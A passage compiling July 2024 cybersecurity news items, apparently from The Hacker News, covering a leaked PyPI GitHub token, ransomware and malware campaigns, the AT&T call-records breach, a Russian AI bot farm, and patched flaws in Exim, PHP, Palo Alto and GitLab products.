In light of the active abuse of CVE-2024-36401, federal agencies are required to apply the vendor-provided fixes by August 5, 2024.
The development comes as reports have emerged about the active exploitation of a remote code execution vulnerability in the Ghostscript document conversion toolkit (CVE-2024-29510) that could be leveraged to escape the -dSAFER sandbox and run arbitrary code.
The vulnerability, addressed in version 10.03.1 following responsible disclosure by Codean Labs on March 14, 2024, has since been weaponized to obtain shell access to vulnerable systems, according to ReadMe developer Bill Mill.
GitHub Token Leak Exposes Python's
Core Repositories to Potential Attacks
16.7.24
Hacking
The Hacker News
Cybersecurity researchers said they discovered an accidentally leaked GitHub
token that could have granted elevated access to the GitHub repositories of the
Python language, Python Package Index (PyPI), and the Python Software Foundation
(PSF) repositories.
JFrog, which found the GitHub Personal Access Token, said the secret was leaked in a public Docker container hosted on Docker Hub.
"This case was exceptional because it is difficult to overestimate the potential consequences if it had fallen into the wrong hands – one could supposedly inject malicious code into PyPI packages (imagine replacing all Python packages with malicious ones), and even to the Python language itself," the software supply chain security company said.
An attacker could have hypothetically weaponized their admin access to orchestrate a large-scale supply chain attack by poisoning the source code associated with the core of the Python programming language, or the PyPI package manager.
JFrog noted that the authentication token was found inside a Docker container, in a compiled Python file ("build.cpython-311.pyc") that was inadvertently not cleaned up.
Following responsible disclosure on June 28, 2024, the token – which was issued for the GitHub account linked to PyPI Admin Ee Durbin – was immediately revoked. There is no evidence that the secret was exploited in the wild.
PyPI said the token was issued sometime prior to March 3, 2023, and that the
exact date is unknown due to the fact that security logs are unavailable beyond
90 days.
"While developing cabotage-app5 locally, working on the build portion of the codebase, I was consistently running into GitHub API rate limits," Durbin explained.
"These rate limits apply to anonymous access. While in production the system is configured as a GitHub App, I modified my local files to include my own access token in an act of laziness, rather than configure a localhost GitHub App. These changes were never intended to be pushed remotely."
The disclosure comes as Checkmarx uncovered a series of malicious packages on PyPI that are designed to exfiltrate sensitive information to a Telegram bot without victims' consent or knowledge.
The packages in question – testbrojct2, proxyfullscraper, proxyalhttp, and proxyfullscrapers – work by scanning the compromised system for files matching extensions like .py, .php, .zip, .png, .jpg, and .jpeg.
"The Telegram bot is linked to multiple cybercriminal operations based in Iraq," Checkmarx researcher Yehuda Gelb said, noting the bot's message history dates all the way back to 2022.
"The bot functions also as an underground marketplace offering social media manipulation services. It has been linked to financial theft and exploits victims by exfiltrating their data."
CRYSTALRAY Hackers Infect Over 1,500
Victims Using Network Mapping Tool
15.7.24
Hacking
The Hacker News
A threat actor that was previously observed using an open-source network mapping
tool has greatly expanded their operations to infect over 1,500 victims.
Sysdig, which is tracking the cluster under the name CRYSTALRAY, said the activities have witnessed a 10x surge, adding it includes "mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple [open-source software] security tools."
The primary objective of the attacks is to harvest and sell credentials, deploy
cryptocurrency miners, and maintain persistence in victim environments.
Prominent among the open-source programs used by the threat actor is SSH-Snake,
which was first released in January 2024. It has been described as a tool to
carry out automatic network traversal using SSH private keys discovered on
systems.
The abuse of the software by CRYSTALRAY was documented by the cybersecurity company earlier this February, with the tool deployed for lateral movement following the exploitation of known security flaws in public-facing Apache ActiveMQ and Atlassian Confluence instances.
Joshua Rogers, the developer behind SSH-Snake told The Hacker News at the time that the tool only automates what would have been otherwise manual steps, and called on companies to "discover the attack paths that exist – and fix them."
Some of the other tools employed by the attackers include asn, zmap, httpx, and
nuclei in order to check if a domain is active and launch scans for vulnerable
services such as Apache ActiveMQ, Apache RocketMQ, Atlassian Confluence,
Laravel, Metabase, Openfire, Oracle WebLogic Server, and Solr.
CRYSTALRAY also weaponizes its initial foothold to conduct a wide-ranging
credential discovery process that goes beyond moving between servers accessible
via SSH. Persistent access to the compromised environment is accomplished by
means of a legitimate command-and-control (C2) framework called Sliver and a
reverse shell manager codenamed Platypus.
In a further bid to derive monetary value from the infected assets, cryptocurrency miner payloads are delivered to illicitly use the victim resources for financial gain, while simultaneously taking steps to terminate competing miners that may have already been running on the machines.
"CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars," Sysdig researcher Miguel Hernández said. "The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers."
Singapore Banks to Phase Out OTPs
for Online Logins Within 3 Months
15.7.24
Security
The Hacker News
Retail banking institutions in Singapore have three months to phase out the use
of one-time passwords (OTPs) for authentication purposes when signing into
online accounts to mitigate the risk of phishing attacks.
The decision was announced by the Monetary Authority of Singapore (MAS) and The Association of Banks in Singapore (ABS) on July 9, 2024.
"Customers who have activated their digital token on their mobile device will have to use their digital tokens for bank account logins via the browser or the mobile banking app," the MAS said.
"The digital token will authenticate customers' login without the need for an OTP that scammers can steal, or trick customers into disclosing."
The MAS is also urging customers to activate their digital tokens to safeguard
against attacks that are designed to steal credentials and hijack their accounts
for conducting financial fraud.
"This measure provides customers with further protection against unauthorized
access to their bank accounts," Ong-Ang Ai Boon, director of ABS, said in a
statement. "While they may give rise to some inconvenience, such measures are
necessary to help prevent scams and protect customers."
While OTPs were originally introduced as a form of second-factor authentication (2FA) to bolster account security, cybercriminals have devised banking trojans, OTP bots, and phishing kits that are capable of harvesting such codes using lookalike sites.
OTP bots, accessible via Telegram and advertised for anywhere between $100 and $420, take social engineering to the next level by calling users and convincing them to enter the 2FA code on their phones to help bypass account protections.
It's important to mention that such bots are mainly designed to plunder a victim's OTP code, necessitating that scammers obtain valid credentials through other means such as data breaches, datasets available for sale on the dark web, and credential harvesting web pages.
"The OTP bot's key task is to call the victim. It is calls that scammers count on, as verification codes are only valid for a limited time," Kaspersky threat researcher Olga Svistunova said in a recent report.
"Whereas a message may stay unanswered for a while, calling the user increases
the chances of getting the code. A phone call is also an opportunity to try and
produce the desired effect on the victim with the tone of voice."
Last week, SlashNext disclosed details of an "end-to-end" phishing toolkit dubbed FishXProxy that, while ostensibly meant for "educational purposes only," lowers the technical bar for aspiring threat actors looking to mount phishing campaigns at scale while skirting defenses.
"FishXProxy equips cybercriminals with a formidable arsenal for multi-layered
email phishing attacks," the company noted. "Campaigns begin with uniquely
generated links or dynamic attachments, bypassing initial scrutiny."
"Victims then face advanced antibot systems using Cloudflare's CAPTCHA,
filtering out security tools. A clever redirection system obscures true
destinations, while page expiration settings hinder analysis and aid campaign
management."
Another noteworthy addition to FishXProxy is the use of a cookie-based tracking system that allows attackers to identify and track users across different phishing projects or campaigns. It can also create malicious file attachments using HTML smuggling techniques that make it possible to evade sidestep detection.
"HTML smuggling is quite effective in bypassing perimeter security controls such as email gateways and web proxies for two main reasons: It abuses the legitimate features of HTML5 and JavaScript, and it leverages different forms of encoding and encryption," Cisco Talos said.
The rise of mobile malware over the years has since also prompted Google to unveil a new pilot program in Singapore that aims to prevent users from sideloading certain apps that abuse Android app permissions to read OTPs and gather sensitive data.
New HardBit Ransomware 4.0 Uses
Passphrase Protection to Evade Detection
15.7.24
Ransom
The Hacker News
Cybersecurity researchers have shed light on a new version of a ransomware
strain called HardBit that comes packaged with new obfuscation techniques to
deter analysis efforts.
"Unlike previous versions, HardBit Ransomware group enhanced the version 4.0 with passphrase protection," Cybereason researchers Kotaro Ogino and Koshi Oyama said in an analysis.
"The passphrase needs to be provided during the runtime in order for the ransomware to be executed properly. Additional obfuscation hinders security researchers from analyzing the malware."
HardBit, which first emerged in October 2022, is a financially motivated threat actor that, similar to other ransomware groups, operates with an aim to generate illicit revenues via double extortion tactics.
What makes the threat group stand out is that it does not operate a data leak site, and instead pressurizes victims to pay up by threatening to conduct additional attacks in the future. Its primary mode of communication occurs over the Tox instant messaging service.
The exact initial access vector used to breach target environments is currently
not clear, although it's suspected to involve brute-forcing RDP and SMB
services.
The follow-up steps encompass performing credential theft using tools like
Mimikatz and NLBrute, and network discovery via utilities such as Advanced Port
Scanner, allowing the attackers to laterally move across the network by means of
RDP.
"Having compromised a victim host, the HardBit ransomware payload is executed and performs a number of steps that reduce the security posture of the host before encrypting victim data," Varonis noted in its technical write-up about HardBit 2.0 last year.
Encryption of the victim hosts is carried out by deploying HardBit, which is delivered using a known file infector virus called Neshta. It's worth noting that Neshta has been used by threat actors in the past to also distribute Big Head ransomware.
HardBit is also designed to disable Microsoft Defender Antivirus and terminate processes and services to evade potential detection of its activities and inhibit system recovery. It then encrypts files of interest, updates their icons, changes desktop wallpaper, and alters the system's volume label with string "Locked by HardBit."
Besides being offered to operators in the form of command-line or GUI versions,
the ransomware requires an authorization ID in order for it to be successfully
executed. The GUI flavor further supports a wiper mode to irrevocably erase
files and wipe the disk.
"Once threat actors successfully input the decoded authorization ID, HardBit prompts for an encryption key to encrypt the files on the target machines and it proceeds with ransomware procedure," Cybereason noted.
"Wiper mode feature needs to be enabled by the HardBit Ransomware group and the feature is likely an additional feature that operators need to purchase. If the operators need wiper mode, the operator would need to deploy hard.txt, an optional configuration file of HardBit binary and contains authorization ID to enable wiper mode."
The development comes as cybersecurity firm Trellix detailed a CACTUS ransomware
attack that has been observed exploiting security flaws in Ivanti Sentry
(CVE-2023-38035) to install the file-encrypting malware using legitimate remote
desktop tools like AnyDesk and Splashtop.
Ransomware activity continues to "remain on an upward trend" in 2024, with
ransomware actors claiming 962 attacks in the first quarter of 2024, up from 886
attacks reported year-over-year. LockBit, Akira, and BlackSuit have emerged as
the most prevalent ransomware families during the time period, Symantec said.
According to Palo Alto Networks' 2024 Unit 42 Incident Response report, the median time it takes to go from compromise to data exfiltration plummeted from nine days in 2021 to two days last year. In almost half (45%) of cases this year, it was just under 24 hours.
"Available evidence suggests that exploitation of known vulnerabilities in public-facing applications continues to be the main vector for ransomware attacks," the Broadcom-owned company said. "Bring Your Own Vulnerable Driver (BYOVD) continues to be a favored tactic among ransomware groups, particularly as a means of disabling security solutions."
AT&T Confirms Data Breach Affecting Nearly All Wireless Customers
13.7.24
Incindent
The Hacker News
American telecom service provider AT&T has confirmed that threat actors managed
to access data belonging to "nearly all" of its wireless customers as well as
customers of mobile virtual network operators (MVNOs) using AT&T's wireless
network.
"Threat actors unlawfully accessed an AT&T workspace on a third-party cloud platform and, between April 14 and April 25, 2024, exfiltrated files containing AT&T records of customer call and text interactions that occurred between approximately May 1 and October 31, 2022, as well as on January 2, 2023," it said.
This comprises telephone numbers with which an AT&T or MVNO wireless number interacted – including telephone numbers of AT&T landline customers and customers of other carriers, counts of those interactions, and aggregate call duration for a day or month.
A subset of these records also contained one or more cell site identification numbers, potentially allowing the threat actors to triangulate the approximate location of a customer when a call was made or a text message was sent. AT&T said it will alert current and former customers if their information was involved.
"The threat actors have used data from previous compromises to map phone numbers to identities," Jake Williams, former NSA hacker and faculty at IANS Research, said. "What the threat actors stole here are effectively call data records (CDR), which are a gold mine in intelligence analysis because they can be used to understand who is talking to who — and when."
AT&T's list of MVNOs includes Black Wireless, Boost Infinite, Consumer Cellular, Cricket Wireless, FreedomPop, FreeUp Mobile, Good2Go, H2O Wireless, PureTalk, Red Pocket, Straight Talk Wireless, TracFone Wireless, Unreal Mobile, and Wing.
The name of the third-party cloud provider was not disclosed by AT&T, but Snowflake has since confirmed that the breach was connected to the hack that's impacted other customers, such as Ticketmaster, Santander, Neiman Marcus, and LendingTree, according to Bloomberg.
The company said it became aware of the incident on April 19, 2024, and immediately activated its response efforts. It further noted that it's working with law enforcement in their efforts to arrest those involved, and that "at least one person has been apprehended."
404 Media reported that a 24-year-old U.S. citizen named John Binns, who was previously arrested in Turkey in May 2024, is connected to the security event, citing three unnamed sources. He was also indicted in the U.S. for infiltrating T-Mobile in 2021 and selling its customer data.
However, it emphasized that the accessed information does not include the content of calls or texts, personal information such as Social Security numbers, dates of birth, or other personally identifiable information.
"While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number," it said in a Form 8-K filing with the U.S. Securities and Exchange Commission (SEC).
It's also urging users to be on the lookout for phishing, smishing, and online fraud by only opening text messages from trusted senders. On top of that, customers can submit a request to get the phone numbers of their calls and texts in the illegally downloaded data.
The malicious cyber campaign targeting Snowflake has landed as many as 165 customers in the crosshairs, with Google-owned Mandiant attributing the activity to a financially motivated threat actor dubbed UNC5537 that encompasses "members based in North America, and collaborates with an additional member in Turkey."
The criminals have demanded payments of between $300,000 and $5 million in return for the stolen data. The latest development shows that the fallout from the cybercrime spree is expanding in scope and has had a cascading effect.
WIRED revealed last month how the hackers behind the Snowflake data thefts procured stolen Snowflake credentials from dark web services that sell access to usernames, passwords, and authentication tokens that are captured by stealer malware. This included obtaining access through a third-party contractor named EPAM Systems.
For its part, Snowflake this week announced that administrators can now enforce mandatory multi-factor authentication (MFA) for all users to mitigate the risk of account takeovers. It also said it will soon require MFA for all users in newly created Snowflake accounts.
DarkGate Malware Exploits Samba File Shares in Short-Lived Campaign
13.7.24 Virus The Hacker News
Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections.
Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North America, Europe, and parts of Asia.
"This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware," security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said.
DarkGate, which first emerged in 2018, has evolved into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.
Attacks involving the malware have particularly witnessed a surge in recent
months in the aftermath of the multinational law enforcement takedown of the
QakBot infrastructure in August 2023.
The campaign documented by Unit 42 commences with Microsoft Excel (.xlsx) files that, when opened, urge targets to click on an embedded Open button, which, in turn, fetches and runs VBS code hosted on a Samba file share.
The PowerShell script is configured to retrieve and execute a PowerShell script, which is then used to download an AutoHotKey-based DarkGate package.
Alternate sequences using JavaScript files instead of VBS are no different in that they are also engineered to download and run the follow-up PowerShell script.
DarkGate works by scanning for various anti-malware programs and checking the CPU information to determine if it's running on a physical host or a virtual environment, thereby allowing it to hinder analysis. It also examines the host's running processes to determine the presence of reverse engineering tools, debuggers, or virtualization software.
"DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text," the researchers said.
"As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses."
Australian Defence Force Private and Husband Charged with
Espionage for Russia
12.7.24
BigBrothers
The Hacker News
Two Russian-born Australian citizens have been arrested and charged in the country for spying on behalf of Russia as part of a "complex" law enforcement operation codenamed BURGAZADA.
This includes a 40-year-old woman, an Australian Defence Force (ADF) Army Private, and her husband, a 62-year-old self-employed laborer. Media reports have identified them as Kira Korolev and Igor Korolev, respectively, noting that they had been in Australia for over a decade.
The married couple were arrested at their home in the Brisbane suburb of Everton Park on July 11, 2024, the Australian Federal Police (AFP) said in a statement. They have been charged with one count each of preparing for an espionage offense, which carries a maximum penalty of 15 years' imprisonment.
"It is the first time an espionage offense has been laid in Australia since new laws were introduced by the Commonwealth in 2018," the AFP said.
The federal law enforcement agency has alleged the pair colluded together to obtain sensitive information after the woman traveled to Russia while on a long-term leave from the ADF since 2023.
She is said to have instructed her husband, who remained in Australia, to log into her official work account and instructed him to access specific information and send it directly to her private email account while she was overseas.
"The woman's ADF account credentials were used on a number of occasions to access sensitive ADF information, with the intent to provide it to Russian authorities," the AFP said.
Although the exact documents that were accessed were not disclosed, the AFP said they related to Australian national security interests. An investigation into whether the information was handed over to Russia remains ongoing.
"Espionage is an insidious crime, and at a time of global instability, state actors have ramped-up their efforts to obtain information held by Western democracies, including Australia," AFP Commissioner Reece Kershaw said.
"Espionage is not a victimless crime. It has the potential to impact on Australia's sovereignty, safety and way of life."
The arrests mark the third time individuals have been charged with espionage or foreign interference related offenses since their incorporation into the Criminal Code Act 1995.
Last April, a New South Wales man, 55, was charged with providing information about "Australian defense, economic and national security arrangements" to two individuals associated with a foreign intelligence service who are suspected to be undertaking intelligence gathering activities.
Then in late February 2024, a 68-year-old man from Melbourne was sentenced to two years and nine months in prison for attempting to influence a Federal Parliamentarian on behalf of a foreign government.
Mike Burgess, Director-General of Security in charge of the Australian Security Intelligence Organization (ASIO), said the ongoing threat of espionage is "real," and that "multiple countries are seeking to steal Australia's secrets."
Critical Exim Mail Server
Vulnerability Exposes Millions to Malicious Attachments
12.7.24
Vulnerebility
The Hacker News
A critical security issue has been disclosed in the Exim mail transfer agent
that could enable threat actors to deliver malicious attachments to target
users' inboxes.
The vulnerability, tracked as CVE-2024-39929, has a CVSS score of 9.1 out of 10.0. It has been addressed in version 4.98.
"Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus
remote attackers can bypass a $mime_filename extension-blocking protection
mechanism, and potentially deliver executable attachments to the mailboxes of
end users," according to a description shared on the U.S. National Vulnerability
Database (NVD).
Exim is a free, mail transfer agent that's used in hosts that are running Unix
or Unix-like operating systems. It was first released in 1995 for use at the
University of Cambridge.
Attack surface management firm Censys said 4,830,719 of the 6,540,044 public-facing SMTP mail servers are running Exim. As of July 12, 2024, 1,563,085 internet-accessible Exim servers are running a potentially vulnerable version (4.97.1 or earlier).
A
majority of the vulnerable instances are located in the U.S., Russia, and
Canada.
"The vulnerability could allow a remote attacker to bypass filename extension
blocking protection measures and deliver executable attachments directly to
end-users' mailboxes," it noted. "If a user were to download or run one of these
malicious files, the system could be compromised."
This also means that prospective targets must click on an attached executable for the attack to be successful. While there are no reports of active exploitation of the flaw, it's essential that users move quickly to apply the patches to mitigate potential threats.
The development comes almost a year after the project maintainers a set of six vulnerabilities in Exim that could result in information disclosure and remote code execution.
U.S. Seizes Domains Used by AI-Powered Russian Bot Farm for Disinformation
12.7.24
AI
The Hacker News
The U.S. Department of Justice (DoJ) said it seized two internet domains and searched nearly 1,000 social media accounts that Russian threat actors allegedly used to covertly spread pro-Kremlin disinformation in the country and abroad on a large scale.
"The social media bot farm used elements of AI to create fictitious social media profiles — often purporting to belong to individuals in the United States — which the operators then used to promote messages in support of Russian government objectives," the DoJ said.
The bot network, comprising 968 accounts on X, is said to be part of an elaborate scheme hatched by an employee of Russian state-owned media outlet RT (formerly Russia Today), sponsored by the Kremlin, and aided by an officer of Russia's Federal Security Service (FSB), who created and led an unnamed private intelligence organization.
The developmental efforts for the bot farm began in April 2022 when the individuals procured online infrastructure while anonymizing their identities and locations. The goal of the organization, per the DoJ, was to further Russian interests by spreading disinformation through fictitious online personas representing various nationalities.
The phony social media accounts were registered using private email servers that relied on two domains – mlrtr[.]com and otanmail[.]com – that were purchased from domain registrar Namecheap. X has since suspended the bot accounts for violating its terms of service.
The information operation -- which targeted the U.S., Poland, Germany, the Netherlands, Spain, Ukraine, and Israel -- was pulled off using an AI-powered software package dubbed Meliorator that facilitated the "en masse" creation and operation of said social media bot farm.
"Using this tool, RT affiliates disseminated disinformation to and about a number of countries, including the United States, Poland, Germany, the Netherlands, Spain, Ukraine, and Israel," law enforcement agencies from Canada, the Netherlands, and the U.S. said.
Meliorator includes an administrator panel called Brigadir
and a backend tool called Taras, which is used to control the
authentic-appearing accounts, whose profile pictures and biographical
information were generated using an open-source program called Faker.
Each of these accounts had a distinct identity or "soul" based on one of the
three bot archetypes: Those that propagate political ideologies favorable to the
Russian government, like already shared messaging by other bots, and perpetuate
disinformation shared by both bot and non-bot accounts.
While the software package was only identified on X, further analysis has revealed the threat actors' intentions to extend its functionality to cover other social media platforms.
Furthermore, the system slipped through X's safeguards for
verifying the authenticity of users by automatically copying one-time passcodes
sent to the registered email addresses and assigning proxy IP addresses to
AI-generated personas based on their assumed location.
"Bot persona accounts make obvious attempts to avoid bans for terms of service violations and avoid being noticed as bots by blending into the larger social media environment," the agencies said. "Much like authentic accounts, these bots follow genuine accounts reflective of their political leanings and interests listed in their biography."
"Farming is a beloved pastime for millions of Russians," RT was quoted as saying to Bloomberg in response to the allegations, without directly refuting them.
The development marks the first time the U.S. has publicly pointed fingers at a foreign government for using AI in a foreign influence operation. No criminal charges have been made public in the case, but an investigation into the activity remains ongoing.
Doppelganger Lives On#
In recent months Google, Meta, and OpenAI have warned that Russian
disinformation operations, including those orchestrated by a network dubbed
Doppelganger, have repeatedly leveraged their platforms to disseminate
pro-Russian propaganda.
"The campaign is still active as well as the network and server infrastructure responsible for the content distribution," Qurium and EU DisinfoLab said in a new report published Thursday.
"Astonishingly, Doppelganger does not operate from a hidden data center in a Vladivostok Fortress or from a remote military Bat cave but from newly created Russian providers operating inside the largest data centers in Europe. Doppelganger operates in close association with cybercriminal activities and affiliate advertisement networks."
At
the heart of the operation is a network of bulletproof hosting providers
encompassing Aeza, Evil Empire, GIR, and TNSECURITY, which have also harbored
command-and-control domains for different malware families like Stealc, Amadey,
Agent Tesla, Glupteba, Raccoon Stealer, RisePro, RedLine Stealer, RevengeRAT,
Lumma, Meduza, and Mystic.
What's more, NewsGuard, which provides a host of tools to counter
misinformation, recently found that popular AI chatbots are prone to repeating
"fabricated narratives from state-affiliated sites masquerading as local news
outlets in one third of their responses."
Influence Operations from Iran and China#
It also comes as the U.S. Office of the Director of National Intelligence (ODNI)
said that Iran is "becoming increasingly aggressive in their foreign influence
efforts, seeking to stoke discord and undermine confidence in our democratic
institutions."
The agency further noted that the Iranian actors continue to refine their cyber and influence activities, using social media platforms and issuing threats, and that they are amplifying pro-Gaza protests in the U.S. by posing as activists online.
Google, for its part, said it blocked in the first quarter of 2024 over 10,000 instances of Dragon Bridge (aka Spamouflage Dragon) activity, which is the name given to a spammy-yet-persistent influence network linked to China, across YouTube and Blogger that promoted narratives portraying the U.S. in a negative light as well as content related to the elections in Taiwan and the Israel-Hamas war targeting Chinese speakers.
In comparison, the tech giant disrupted no less than 50,000 such instances in 2022 and 65,000 more in 2023. In all, it has prevented over 175,000 instances to date during the network's lifetime.
"Despite their continued profuse content production and the scale of their operations, DRAGONBRIDGE achieves practically no organic engagement from real viewers," Threat Analysis Group (TAG) researcher Zak Butler said. "In the cases where DRAGONBRIDGE content did receive engagement, it was almost entirely inauthentic, coming from other DRAGONBRIDGE accounts and not from authentic users."
Palo Alto Networks Patches Critical Flaw in Expedition Migration Tool
12.7.24
Vulnerebility
The Hacker News
Palo Alto Networks has released security updates to address five security flaws
impacting its products, including a critical bug that could lead to an
authentication bypass.
Cataloged as CVE-2024-5910 (CVSS score: 9.3), the vulnerability has been described as a case of missing authentication in its Expedition migration tool that could lead to an admin account takeover.
"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition," the company said in an advisory. "Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue."
The flaw impacts all versions of Expedition prior to version 1.2.92, which remediates the problem. Synopsys Cybersecurity Research Center's (CyRC) Brian Hysell has been credited with discovering and reporting the issue.
While there is no evidence that the vulnerability has been exploited in the wild, users are advised to update to the latest version to secure against potential threats.
As workarounds, Palo Alto Networks is recommending that network access to Expedition is restricted to authorized users, hosts, or networks.
Also fixed by the American cybersecurity firm is a newly
disclosed flaw in the RADIUS protocol called BlastRADIUS (CVE-2024-3596) that
could allow a bad actor with capabilities to perform an adversary-in-the-middle
(AitM) attack between Palo Alto Networks PAN-OS firewall and a RADIUS server to
sidestep authentication.
The vulnerability then permits the attacker to "escalate privileges to
'superuser' when RADIUS authentication is in use and either CHAP or PAP is
selected in the RADIUS server profile," it said.
The following products are affected by the shortcomings:
PAN-OS 11.1 (versions < 11.1.3, fixed in >= 11.1.3)
PAN-OS 11.0 (versions < 11.0.4-h4, fixed in >= 11.0.4-h4)
PAN-OS 10.2 (versions < 10.2.10, fixed in >= 10.2.10)
PAN-OS 10.1 (versions < 10.1.14, fixed in >= 10.1.14)
PAN-OS 9.1 (versions < 9.1.19, fixed in >= 9.1.19)
Prisma Access (all versions, fix expected to be released on July 30)
It also noted that neither CHAP nor PAP should be used unless they are
encapsulated by an encrypted tunnel since the authentication protocols do not
offer Transport Layer Security (TLS). They are not vulnerable in cases where
they are used in conjunction with a TLS tunnel.
However, it's worth noting that PAN-OS firewalls configured to use EAP-TTLS with PAP as the authentication protocol for a RADIUS server are also not susceptible to the attack.
60 New Malicious Packages Uncovered in NuGet Supply Chain Attack
12.7.24
Virus
The Hacker News
Threat actors have been observed publishing a new wave of malicious packages to
the NuGet package manager as part of an ongoing campaign that began in August
2023, while also adding a new layer of stealth to evade detection.
The fresh packages, about 60 in number and spanning 290
versions, demonstrate a refined approach from the previous set that came to
light in October 2023, software supply chain security firm ReversingLabs said.
The attackers pivoted from using NuGet's MSBuild integrations to "a strategy
that uses simple, obfuscated downloaders that are inserted into legitimate PE
binary files using Intermediary Language (IL) Weaving, a .NET programming
technique for modifying an application's code after compilation," security
researcher Karlo Zanki said.
The end goal of the counterfeit packages, both old and new, is to deliver an off-the-shelf remote access trojan called SeroXen RAT. All the identified packages have since been taken down.
The latest collection of packages is characterized by the use of a novel
technique called IL weaving that makes it possible to inject malicious
functionality to a Portable Executable (PE) .NET binary associated with a
legitimate NuGet package.
This includes taking popular open-source packages like
Guna.UI2.WinForms and patching it with the aforementioned method to create an
imposter package that's named "Gսոa.UI3.Wіnfօrms," which uses homoglyphs to
substitute the letters "u," "n," "i," and "o" with their equivalents "ս"
(\u057D), "ո" (\u0578), "і" (\u0456). and "օ" (\u0585).
"Threat actors are constantly evolving the methods and tactics they use to
compromise and infect their victims with malicious code that is used to extract
sensitive data or provide attackers with control over IT assets," Zanki said.
"This latest campaign highlights new ways in which malicious actors are scheming to fool developers as well as security teams into downloading and using malicious or tampered with packages from popular open source package managers like NuGet."
PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks
11.7.24
Exploit
The Hacker News
Multiple threat actors have been observed exploiting a recently disclosed
security flaw in PHP to deliver remote access trojans, cryptocurrency miners,
and distributed denial-of-service (DDoS) botnets.
The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It was publicly disclosed in early June 2024.
"CVE-2024-4577 is a flaw that allows an attacker to escape the command line and
pass arguments to be interpreted directly by PHP," Akamai researchers Kyle
Lefton, Allen West, and Sam Tinklenberg said in a Wednesday analysis. "The
vulnerability itself lies in how Unicode characters are converted into ASCII."
The web infrastructure company said it began observing exploit attempts against
its honeypot servers targeting the PHP flaw within 24 hours of it being public
knowledge.
This included exploits designed to deliver a remote access trojan called Gh0st RAT, cryptocurrency miners like RedTail and XMRig, and a DDoS botnet named Muhstik.
"The attacker sent a request similar to the others seen previous RedTail operations, abusing the soft hyphen flaw with '%ADd,' to execute a wget request for a shell script," the researchers explained. "This script makes an additional network request to the same Russia-based IP address to retrieve an x86 version of the RedTail crypto-mining malware."
Last month, Imperva also revealed that CVE-2024-4577 is being exploited by TellYouThePass ransomware actors to distribute a .NET variant of the file-encrypting malware.
Users and organizations relying on PHP are recommended to update their installations to the latest version to safeguard against active threats.
"The continuously shrinking time that defenders have to protect themselves after
a new vulnerability disclosure is yet another critical security risk," the
researchers said. "This is especially true for this PHP vulnerability because of
its high exploitability and quick adoption by threat actors."
The disclosure comes as Cloudflare said it recorded a 20% year-over-year
increase in DDoS attacks in the second quarter of 2024, and that it mitigated
8.5 million DDoS attacks during the first six months. In comparison, the company
blocked 14 million DDoS attacks for the entirety of 2023.
"Overall, the number of DDoS attacks in Q2 decreased by 11% quarter-over-quarter, but increased 20% year-over-year," researchers Omer Yoachimik and Jorge Pacheco said in the DDoS threat report for Q2 2024.
What's more, known DDoS botnets accounted for half of all HTTP DDoS attacks. Fake user agents and headless browsers (29%), suspicious HTTP attributes (13%), and generic floods (7%) were the other prominent HTTP DDoS attack vectors.
The most attacked country during the time period was China, followed by Turkey, Singapore, Hong Kong, Russia, Brazil, Thailand, Canada, Taiwan, and Kyrgyztan. Information technology and services, telecom, consumer goods, education, construction, and food and beverage emerged as the top sectors targeted by DDoS attacks.
"Argentina was ranked as the largest source of DDoS attacks in the second quarter of 2024," the researchers said. "Indonesia followed closely in second place, followed by the Netherlands in third."
GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Jobs
11.7.24
Vulnerebility
The Hacker News
GitLab has shipped another round of updates to close out security flaws in its
software development platform, including a critical bug that allows an attacker
to run pipeline jobs as an arbitrary user.
Tracked as CVE-2024-6385, the vulnerability carries a CVSS score of 9.6 out of a maximum of 10.0.
"An issue was discovered in GitLab CE/EE affecting versions 15.8 prior to 16.11.6, 17.0 prior to 17.0.4, and 17.1 prior to 17.1.2, which allows an attacker to trigger a pipeline as another user under certain circumstances," the company said in a Wednesday advisory.
It's worth noting that the company patched a similar bug late last month
(CVE-2024-5655, CVSS score: 9.6) that could also be weaponized to run pipelines
as other users.
Also addressed by GitLab is a medium-severity issue (CVE-2024-5257, CVSS score:
4.9) that allows a Developer user with admin_compliance_framework permissions to
modify the URL for a group namespace.
All the security shortcomings have been fixed in GitLab Community Edition (CE) and Enterprise Edition (EE) versions 17.1.2, 17.0.4, and 16.11.6.
The disclosure comes as Citrix released updates for a critical, improper authentication flaw impacting NetScaler Console (formerly NetScaler ADM), NetScaler SDX, and NetScaler Agent (CVE-2024-6235, CVSS score: 9.4) that could result in information disclosure.
Patches have also also released by Broadcom for two medium-severity injection vulnerabilities in VMware Cloud Director (CVE-2024-22277, CVSS score: 6.4) and VMware Aria Automation (CVE-2024-22280, CVSS score: 8.5) that could be abused to execute malicious code using specially crafted HTML tags and SQL queries, respectively.
CISA Releases Bulletins to Tackle Software Flaws#
The developments also follow a new bulletin released by the U.S. Cybersecurity
and Infrastructure Security Agency (CISA) and the Federal Bureau of
Investigation (FBI) urging technology manufacturers to weed out operating system
(OS) command injection flaws in software that allow threat actors to remotely
execute code on network edge devices.
